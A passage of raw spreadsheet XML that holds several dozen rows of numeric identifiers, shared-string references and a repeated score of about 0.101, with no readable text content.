    <row r="15606" ht="15.75" customHeight="1">
      <c r="A15606" s="1">
        <v>2239.0</v>
      </c>
      <c r="B15606" s="2">
        <v>3.2302132E7</v>
      </c>
      <c r="C15606" s="2" t="s">
        <v>15057</v>
      </c>
      <c r="D15606" s="2">
        <v>1.0</v>
      </c>
      <c r="E15606" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15606" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15607" ht="15.75" customHeight="1">
      <c r="A15607" s="1">
        <v>2295.0</v>
      </c>
      <c r="B15607" s="2">
        <v>3.2650186E7</v>
      </c>
      <c r="C15607" s="2" t="s">
        <v>15058</v>
      </c>
      <c r="D15607" s="2">
        <v>1.0</v>
      </c>
      <c r="E15607" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15607" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15608" ht="15.75" customHeight="1">
      <c r="A15608" s="1">
        <v>2564.0</v>
      </c>
      <c r="B15608" s="2">
        <v>3.4239189E7</v>
      </c>
      <c r="C15608" s="2" t="s">
        <v>15059</v>
      </c>
      <c r="D15608" s="2">
        <v>1.0</v>
      </c>
      <c r="E15608" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15608" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15609" ht="15.75" customHeight="1">
      <c r="A15609" s="1">
        <v>3038.0</v>
      </c>
      <c r="B15609" s="2">
        <v>3.648485E7</v>
      </c>
      <c r="C15609" s="2" t="s">
        <v>15060</v>
      </c>
      <c r="D15609" s="2">
        <v>1.0</v>
      </c>
      <c r="E15609" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15609" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15610" ht="15.75" customHeight="1">
      <c r="A15610" s="1">
        <v>3214.0</v>
      </c>
      <c r="B15610" s="2">
        <v>3.7299937E7</v>
      </c>
      <c r="C15610" s="2" t="s">
        <v>15061</v>
      </c>
      <c r="D15610" s="2">
        <v>1.0</v>
      </c>
      <c r="E15610" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15610" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15611" ht="15.75" customHeight="1">
      <c r="A15611" s="1">
        <v>3376.0</v>
      </c>
      <c r="B15611" s="2">
        <v>3.7916921E7</v>
      </c>
      <c r="C15611" s="2" t="s">
        <v>15062</v>
      </c>
      <c r="D15611" s="2">
        <v>1.0</v>
      </c>
      <c r="E15611" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15611" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15612" ht="15.75" customHeight="1">
      <c r="A15612" s="1">
        <v>3773.0</v>
      </c>
      <c r="B15612" s="2">
        <v>3.9861478E7</v>
      </c>
      <c r="C15612" s="2" t="s">
        <v>15063</v>
      </c>
      <c r="D15612" s="2">
        <v>1.0</v>
      </c>
      <c r="E15612" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15612" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15613" ht="15.75" customHeight="1">
      <c r="A15613" s="1">
        <v>4187.0</v>
      </c>
      <c r="B15613" s="2">
        <v>4.1567781E7</v>
      </c>
      <c r="C15613" s="2" t="s">
        <v>15064</v>
      </c>
      <c r="D15613" s="2">
        <v>1.0</v>
      </c>
      <c r="E15613" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15613" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15614" ht="15.75" customHeight="1">
      <c r="A15614" s="1">
        <v>4249.0</v>
      </c>
      <c r="B15614" s="2">
        <v>4.1801813E7</v>
      </c>
      <c r="C15614" s="2" t="s">
        <v>15065</v>
      </c>
      <c r="D15614" s="2">
        <v>1.0</v>
      </c>
      <c r="E15614" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15614" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15615" ht="15.75" customHeight="1">
      <c r="A15615" s="1">
        <v>4400.0</v>
      </c>
      <c r="B15615" s="2">
        <v>4.2264358E7</v>
      </c>
      <c r="C15615" s="2" t="s">
        <v>15066</v>
      </c>
      <c r="D15615" s="2">
        <v>1.0</v>
      </c>
      <c r="E15615" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15615" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15616" ht="15.75" customHeight="1">
      <c r="A15616" s="1">
        <v>4577.0</v>
      </c>
      <c r="B15616" s="2">
        <v>4.276667E7</v>
      </c>
      <c r="C15616" s="2" t="s">
        <v>15067</v>
      </c>
      <c r="D15616" s="2">
        <v>1.0</v>
      </c>
      <c r="E15616" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15616" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15617" ht="15.75" customHeight="1">
      <c r="A15617" s="1">
        <v>4704.0</v>
      </c>
      <c r="B15617" s="2">
        <v>4.3251935E7</v>
      </c>
      <c r="C15617" s="2" t="s">
        <v>15068</v>
      </c>
      <c r="D15617" s="2">
        <v>1.0</v>
      </c>
      <c r="E15617" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15617" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15618" ht="15.75" customHeight="1">
      <c r="A15618" s="1">
        <v>5284.0</v>
      </c>
      <c r="B15618" s="2">
        <v>4.5189549E7</v>
      </c>
      <c r="C15618" s="2" t="s">
        <v>15069</v>
      </c>
      <c r="D15618" s="2">
        <v>1.0</v>
      </c>
      <c r="E15618" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15618" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15619" ht="15.75" customHeight="1">
      <c r="A15619" s="1">
        <v>5285.0</v>
      </c>
      <c r="B15619" s="2">
        <v>4.5189549E7</v>
      </c>
      <c r="C15619" s="2" t="s">
        <v>15070</v>
      </c>
      <c r="D15619" s="2">
        <v>1.0</v>
      </c>
      <c r="E15619" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15619" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15620" ht="15.75" customHeight="1">
      <c r="A15620" s="1">
        <v>5333.0</v>
      </c>
      <c r="B15620" s="2">
        <v>4.5317798E7</v>
      </c>
      <c r="C15620" s="2" t="s">
        <v>15071</v>
      </c>
      <c r="D15620" s="2">
        <v>1.0</v>
      </c>
      <c r="E15620" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15620" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15621" ht="15.75" customHeight="1">
      <c r="A15621" s="1">
        <v>5647.0</v>
      </c>
      <c r="B15621" s="2">
        <v>4.6275029E7</v>
      </c>
      <c r="C15621" s="2" t="s">
        <v>15072</v>
      </c>
      <c r="D15621" s="2">
        <v>1.0</v>
      </c>
      <c r="E15621" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15621" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15622" ht="15.75" customHeight="1">
      <c r="A15622" s="1">
        <v>5722.0</v>
      </c>
      <c r="B15622" s="2">
        <v>4.6591648E7</v>
      </c>
      <c r="C15622" s="2" t="s">
        <v>15073</v>
      </c>
      <c r="D15622" s="2">
        <v>1.0</v>
      </c>
      <c r="E15622" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15622" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15623" ht="15.75" customHeight="1">
      <c r="A15623" s="1">
        <v>5844.0</v>
      </c>
      <c r="B15623" s="2">
        <v>4.6923482E7</v>
      </c>
      <c r="C15623" s="2" t="s">
        <v>15074</v>
      </c>
      <c r="D15623" s="2">
        <v>1.0</v>
      </c>
      <c r="E15623" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15623" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15624" ht="15.75" customHeight="1">
      <c r="A15624" s="1">
        <v>6145.0</v>
      </c>
      <c r="B15624" s="2">
        <v>4.7835781E7</v>
      </c>
      <c r="C15624" s="2" t="s">
        <v>15075</v>
      </c>
      <c r="D15624" s="2">
        <v>1.0</v>
      </c>
      <c r="E15624" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15624" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15625" ht="15.75" customHeight="1">
      <c r="A15625" s="1">
        <v>7361.0</v>
      </c>
      <c r="B15625" s="2">
        <v>5.1003393E7</v>
      </c>
      <c r="C15625" s="2" t="s">
        <v>15076</v>
      </c>
      <c r="D15625" s="2">
        <v>1.0</v>
      </c>
      <c r="E15625" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15625" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15626" ht="15.75" customHeight="1">
      <c r="A15626" s="1">
        <v>8993.0</v>
      </c>
      <c r="B15626" s="2">
        <v>5.4962246E7</v>
      </c>
      <c r="C15626" s="2" t="s">
        <v>15077</v>
      </c>
      <c r="D15626" s="2">
        <v>1.0</v>
      </c>
      <c r="E15626" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15626" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15627" ht="15.75" customHeight="1">
      <c r="A15627" s="1">
        <v>9982.0</v>
      </c>
      <c r="B15627" s="2">
        <v>5.6954144E7</v>
      </c>
      <c r="C15627" s="2" t="s">
        <v>15078</v>
      </c>
      <c r="D15627" s="2">
        <v>1.0</v>
      </c>
      <c r="E15627" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15627" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15628" ht="15.75" customHeight="1">
      <c r="A15628" s="1">
        <v>11153.0</v>
      </c>
      <c r="B15628" s="2">
        <v>1.9426711E7</v>
      </c>
      <c r="C15628" s="2" t="s">
        <v>15079</v>
      </c>
      <c r="D15628" s="2">
        <v>1.0</v>
      </c>
      <c r="E15628" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15628" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15629" ht="15.75" customHeight="1">
      <c r="A15629" s="1">
        <v>11168.0</v>
      </c>
      <c r="B15629" s="2">
        <v>1.9628217E7</v>
      </c>
      <c r="C15629" s="2" t="s">
        <v>15080</v>
      </c>
      <c r="D15629" s="2">
        <v>1.0</v>
      </c>
      <c r="E15629" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15629" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15630" ht="15.75" customHeight="1">
      <c r="A15630" s="1">
        <v>11343.0</v>
      </c>
      <c r="B15630" s="2">
        <v>2.1219859E7</v>
      </c>
      <c r="C15630" s="2" t="s">
        <v>15081</v>
      </c>
      <c r="D15630" s="2">
        <v>1.0</v>
      </c>
      <c r="E15630" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15630" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15631" ht="15.75" customHeight="1">
      <c r="A15631" s="1">
        <v>12632.0</v>
      </c>
      <c r="B15631" s="2">
        <v>3.0281795E7</v>
      </c>
      <c r="C15631" s="2" t="s">
        <v>15082</v>
      </c>
      <c r="D15631" s="2">
        <v>1.0</v>
      </c>
      <c r="E15631" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15631" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15632" ht="15.75" customHeight="1">
      <c r="A15632" s="1">
        <v>12923.0</v>
      </c>
      <c r="B15632" s="2">
        <v>3.230255E7</v>
      </c>
      <c r="C15632" s="2" t="s">
        <v>15057</v>
      </c>
      <c r="D15632" s="2">
        <v>1.0</v>
      </c>
      <c r="E15632" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15632" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15633" ht="15.75" customHeight="1">
      <c r="A15633" s="1">
        <v>13126.0</v>
      </c>
      <c r="B15633" s="2">
        <v>3.3654344E7</v>
      </c>
      <c r="C15633" s="2" t="s">
        <v>15083</v>
      </c>
      <c r="D15633" s="2">
        <v>1.0</v>
      </c>
      <c r="E15633" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15633" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15634" ht="15.75" customHeight="1">
      <c r="A15634" s="1">
        <v>13606.0</v>
      </c>
      <c r="B15634" s="2">
        <v>3.5812377E7</v>
      </c>
      <c r="C15634" s="2" t="s">
        <v>15084</v>
      </c>
      <c r="D15634" s="2">
        <v>1.0</v>
      </c>
      <c r="E15634" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15634" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15635" ht="15.75" customHeight="1">
      <c r="A15635" s="1">
        <v>13622.0</v>
      </c>
      <c r="B15635" s="2">
        <v>3.5874039E7</v>
      </c>
      <c r="C15635" s="2" t="s">
        <v>15085</v>
      </c>
      <c r="D15635" s="2">
        <v>1.0</v>
      </c>
      <c r="E15635" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15635" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15636" ht="15.75" customHeight="1">
      <c r="A15636" s="1">
        <v>13651.0</v>
      </c>
      <c r="B15636" s="2">
        <v>3.5944947E7</v>
      </c>
      <c r="C15636" s="2" t="s">
        <v>15086</v>
      </c>
      <c r="D15636" s="2">
        <v>1.0</v>
      </c>
      <c r="E15636" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15636" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15637" ht="15.75" customHeight="1">
      <c r="A15637" s="1">
        <v>13959.0</v>
      </c>
      <c r="B15637" s="2">
        <v>3.7298978E7</v>
      </c>
      <c r="C15637" s="2" t="s">
        <v>15087</v>
      </c>
      <c r="D15637" s="2">
        <v>1.0</v>
      </c>
      <c r="E15637" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15637" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15638" ht="15.75" customHeight="1">
      <c r="A15638" s="1">
        <v>14141.0</v>
      </c>
      <c r="B15638" s="2">
        <v>3.793798E7</v>
      </c>
      <c r="C15638" s="2" t="s">
        <v>15088</v>
      </c>
      <c r="D15638" s="2">
        <v>1.0</v>
      </c>
      <c r="E15638" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15638" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15639" ht="15.75" customHeight="1">
      <c r="A15639" s="1">
        <v>14440.0</v>
      </c>
      <c r="B15639" s="2">
        <v>3.9306026E7</v>
      </c>
      <c r="C15639" s="2" t="s">
        <v>15089</v>
      </c>
      <c r="D15639" s="2">
        <v>1.0</v>
      </c>
      <c r="E15639" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15639" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15640" ht="15.75" customHeight="1">
      <c r="A15640" s="1">
        <v>14620.0</v>
      </c>
      <c r="B15640" s="2">
        <v>4.0279408E7</v>
      </c>
      <c r="C15640" s="2" t="s">
        <v>15090</v>
      </c>
      <c r="D15640" s="2">
        <v>1.0</v>
      </c>
      <c r="E15640" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15640" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15641" ht="15.75" customHeight="1">
      <c r="A15641" s="1">
        <v>15641.0</v>
      </c>
      <c r="B15641" s="2">
        <v>4.3597376E7</v>
      </c>
      <c r="C15641" s="2" t="s">
        <v>15091</v>
      </c>
      <c r="D15641" s="2">
        <v>1.0</v>
      </c>
      <c r="E15641" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15641" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15642" ht="15.75" customHeight="1">
      <c r="A15642" s="1">
        <v>15814.0</v>
      </c>
      <c r="B15642" s="2">
        <v>4.4255735E7</v>
      </c>
      <c r="C15642" s="2" t="s">
        <v>15092</v>
      </c>
      <c r="D15642" s="2">
        <v>1.0</v>
      </c>
      <c r="E15642" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15642" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15643" ht="15.75" customHeight="1">
      <c r="A15643" s="1">
        <v>16206.0</v>
      </c>
      <c r="B15643" s="2">
        <v>4.5679275E7</v>
      </c>
      <c r="C15643" s="2" t="s">
        <v>15093</v>
      </c>
      <c r="D15643" s="2">
        <v>1.0</v>
      </c>
      <c r="E15643" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15643" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15644" ht="15.75" customHeight="1">
      <c r="A15644" s="1">
        <v>16335.0</v>
      </c>
      <c r="B15644" s="2">
        <v>4.6044796E7</v>
      </c>
      <c r="C15644" s="2" t="s">
        <v>15094</v>
      </c>
      <c r="D15644" s="2">
        <v>1.0</v>
      </c>
      <c r="E15644" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15644" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15645" ht="15.75" customHeight="1">
      <c r="A15645" s="1">
        <v>16339.0</v>
      </c>
      <c r="B15645" s="2">
        <v>4.6052763E7</v>
      </c>
      <c r="C15645" s="2" t="s">
        <v>15095</v>
      </c>
      <c r="D15645" s="2">
        <v>1.0</v>
      </c>
      <c r="E15645" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15645" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15646" ht="15.75" customHeight="1">
      <c r="A15646" s="1">
        <v>16714.0</v>
      </c>
      <c r="B15646" s="2">
        <v>4.7440041E7</v>
      </c>
      <c r="C15646" s="2" t="s">
        <v>15096</v>
      </c>
      <c r="D15646" s="2">
        <v>1.0</v>
      </c>
      <c r="E15646" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15646" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15647" ht="15.75" customHeight="1">
      <c r="A15647" s="1">
        <v>16759.0</v>
      </c>
      <c r="B15647" s="2">
        <v>4.7602229E7</v>
      </c>
      <c r="C15647" s="2" t="s">
        <v>15097</v>
      </c>
      <c r="D15647" s="2">
        <v>1.0</v>
      </c>
      <c r="E15647" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15647" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15648" ht="15.75" customHeight="1">
      <c r="A15648" s="1">
        <v>16985.0</v>
      </c>
      <c r="B15648" s="2">
        <v>4.8327119E7</v>
      </c>
      <c r="C15648" s="2" t="s">
        <v>15098</v>
      </c>
      <c r="D15648" s="2">
        <v>1.0</v>
      </c>
      <c r="E15648" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15648" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15649" ht="15.75" customHeight="1">
      <c r="A15649" s="1">
        <v>17647.0</v>
      </c>
      <c r="B15649" s="2">
        <v>5.0409562E7</v>
      </c>
      <c r="C15649" s="2" t="s">
        <v>15099</v>
      </c>
      <c r="D15649" s="2">
        <v>1.0</v>
      </c>
      <c r="E15649" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15649" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15650" ht="15.75" customHeight="1">
      <c r="A15650" s="1">
        <v>17654.0</v>
      </c>
      <c r="B15650" s="2">
        <v>5.0434935E7</v>
      </c>
      <c r="C15650" s="2" t="s">
        <v>15100</v>
      </c>
      <c r="D15650" s="2">
        <v>1.0</v>
      </c>
      <c r="E15650" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15650" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15651" ht="15.75" customHeight="1">
      <c r="A15651" s="1">
        <v>17766.0</v>
      </c>
      <c r="B15651" s="2">
        <v>5.0737336E7</v>
      </c>
      <c r="C15651" s="2" t="s">
        <v>15101</v>
      </c>
      <c r="D15651" s="2">
        <v>1.0</v>
      </c>
      <c r="E15651" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15651" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15652" ht="15.75" customHeight="1">
      <c r="A15652" s="1">
        <v>18096.0</v>
      </c>
      <c r="B15652" s="2">
        <v>5.1694836E7</v>
      </c>
      <c r="C15652" s="2" t="s">
        <v>15102</v>
      </c>
      <c r="D15652" s="2">
        <v>1.0</v>
      </c>
      <c r="E15652" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15652" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15653" ht="15.75" customHeight="1">
      <c r="A15653" s="1">
        <v>18190.0</v>
      </c>
      <c r="B15653" s="2">
        <v>5.2027718E7</v>
      </c>
      <c r="C15653" s="2" t="s">
        <v>15103</v>
      </c>
      <c r="D15653" s="2">
        <v>1.0</v>
      </c>
      <c r="E15653" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15653" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15654" ht="15.75" customHeight="1">
      <c r="A15654" s="1">
        <v>18207.0</v>
      </c>
      <c r="B15654" s="2">
        <v>5.2062865E7</v>
      </c>
      <c r="C15654" s="2" t="s">
        <v>15104</v>
      </c>
      <c r="D15654" s="2">
        <v>1.0</v>
      </c>
      <c r="E15654" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15654" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15655" ht="15.75" customHeight="1">
      <c r="A15655" s="1">
        <v>18716.0</v>
      </c>
      <c r="B15655" s="2">
        <v>5.3668473E7</v>
      </c>
      <c r="C15655" s="2" t="s">
        <v>15105</v>
      </c>
      <c r="D15655" s="2">
        <v>1.0</v>
      </c>
      <c r="E15655" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15655" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15656" ht="15.75" customHeight="1">
      <c r="A15656" s="1">
        <v>18973.0</v>
      </c>
      <c r="B15656" s="2">
        <v>5.4374837E7</v>
      </c>
      <c r="C15656" s="2" t="s">
        <v>15106</v>
      </c>
      <c r="D15656" s="2">
        <v>1.0</v>
      </c>
      <c r="E15656" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15656" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15657" ht="15.75" customHeight="1">
      <c r="A15657" s="1">
        <v>19471.0</v>
      </c>
      <c r="B15657" s="2">
        <v>5.5823484E7</v>
      </c>
      <c r="C15657" s="2" t="s">
        <v>15107</v>
      </c>
      <c r="D15657" s="2">
        <v>1.0</v>
      </c>
      <c r="E15657" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15657" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15658" ht="15.75" customHeight="1">
      <c r="A15658" s="1">
        <v>19520.0</v>
      </c>
      <c r="B15658" s="2">
        <v>5.595726E7</v>
      </c>
      <c r="C15658" s="2" t="s">
        <v>15108</v>
      </c>
      <c r="D15658" s="2">
        <v>1.0</v>
      </c>
      <c r="E15658" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15658" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15659" ht="15.75" customHeight="1">
      <c r="A15659" s="1">
        <v>19555.0</v>
      </c>
      <c r="B15659" s="2">
        <v>5.605664E7</v>
      </c>
      <c r="C15659" s="2" t="s">
        <v>15109</v>
      </c>
      <c r="D15659" s="2">
        <v>1.0</v>
      </c>
      <c r="E15659" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15659" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15660" ht="15.75" customHeight="1">
      <c r="A15660" s="1">
        <v>19605.0</v>
      </c>
      <c r="B15660" s="2">
        <v>5.6184805E7</v>
      </c>
      <c r="C15660" s="2" t="s">
        <v>15110</v>
      </c>
      <c r="D15660" s="2">
        <v>1.0</v>
      </c>
      <c r="E15660" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15660" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15661" ht="15.75" customHeight="1">
      <c r="A15661" s="1">
        <v>19742.0</v>
      </c>
      <c r="B15661" s="2">
        <v>5.6691282E7</v>
      </c>
      <c r="C15661" s="2" t="s">
        <v>15111</v>
      </c>
      <c r="D15661" s="2">
        <v>1.0</v>
      </c>
      <c r="E15661" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15661" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15662" ht="15.75" customHeight="1">
      <c r="A15662" s="1">
        <v>19788.0</v>
      </c>
      <c r="B15662" s="2">
        <v>5.681164E7</v>
      </c>
      <c r="C15662" s="2" t="s">
        <v>15112</v>
      </c>
      <c r="D15662" s="2">
        <v>1.0</v>
      </c>
      <c r="E15662" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15662" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15663" ht="15.75" customHeight="1">
      <c r="A15663" s="1">
        <v>19875.0</v>
      </c>
      <c r="B15663" s="2">
        <v>5.7249885E7</v>
      </c>
      <c r="C15663" s="2" t="s">
        <v>15113</v>
      </c>
      <c r="D15663" s="2">
        <v>1.0</v>
      </c>
      <c r="E15663" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15663" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15664" ht="15.75" customHeight="1">
      <c r="A15664" s="1">
        <v>19926.0</v>
      </c>
      <c r="B15664" s="2">
        <v>5.7433601E7</v>
      </c>
      <c r="C15664" s="2" t="s">
        <v>15114</v>
      </c>
      <c r="D15664" s="2">
        <v>1.0</v>
      </c>
      <c r="E15664" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15664" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15665" ht="15.75" customHeight="1">
      <c r="A15665" s="1">
        <v>20487.0</v>
      </c>
      <c r="B15665" s="2">
        <v>1.2867082E7</v>
      </c>
      <c r="C15665" s="2" t="s">
        <v>15115</v>
      </c>
      <c r="D15665" s="2">
        <v>1.0</v>
      </c>
      <c r="E15665" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15665" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15666" ht="15.75" customHeight="1">
      <c r="A15666" s="1">
        <v>21300.0</v>
      </c>
      <c r="B15666" s="2">
        <v>2.0631346E7</v>
      </c>
      <c r="C15666" s="2" t="s">
        <v>15116</v>
      </c>
      <c r="D15666" s="2">
        <v>1.0</v>
      </c>
      <c r="E15666" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15666" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15667" ht="15.75" customHeight="1">
      <c r="A15667" s="1">
        <v>21710.0</v>
      </c>
      <c r="B15667" s="2">
        <v>2.5400162E7</v>
      </c>
      <c r="C15667" s="2" t="s">
        <v>15117</v>
      </c>
      <c r="D15667" s="2">
        <v>1.0</v>
      </c>
      <c r="E15667" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15667" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15668" ht="15.75" customHeight="1">
      <c r="A15668" s="1">
        <v>23721.0</v>
      </c>
      <c r="B15668" s="2">
        <v>7212170.0</v>
      </c>
      <c r="C15668" s="2" t="s">
        <v>15118</v>
      </c>
      <c r="D15668" s="2">
        <v>1.0</v>
      </c>
      <c r="E15668" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15668" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15669" ht="15.75" customHeight="1">
      <c r="A15669" s="1">
        <v>24240.0</v>
      </c>
      <c r="B15669" s="2">
        <v>1.0478533E7</v>
      </c>
      <c r="C15669" s="2" t="s">
        <v>15119</v>
      </c>
      <c r="D15669" s="2">
        <v>1.0</v>
      </c>
      <c r="E15669" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15669" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15670" ht="15.75" customHeight="1">
      <c r="A15670" s="1">
        <v>27843.0</v>
      </c>
      <c r="B15670" s="2">
        <v>2.3421611E7</v>
      </c>
      <c r="C15670" s="2" t="s">
        <v>15120</v>
      </c>
      <c r="D15670" s="2">
        <v>1.0</v>
      </c>
      <c r="E15670" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15670" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15671" ht="15.75" customHeight="1">
      <c r="A15671" s="1">
        <v>27844.0</v>
      </c>
      <c r="B15671" s="2">
        <v>2.3421611E7</v>
      </c>
      <c r="C15671" s="2" t="s">
        <v>15121</v>
      </c>
      <c r="D15671" s="2">
        <v>1.0</v>
      </c>
      <c r="E15671" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15671" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15672" ht="15.75" customHeight="1">
      <c r="A15672" s="1">
        <v>29374.0</v>
      </c>
      <c r="B15672" s="2">
        <v>3.1725544E7</v>
      </c>
      <c r="C15672" s="2" t="s">
        <v>15122</v>
      </c>
      <c r="D15672" s="2">
        <v>1.0</v>
      </c>
      <c r="E15672" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15672" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
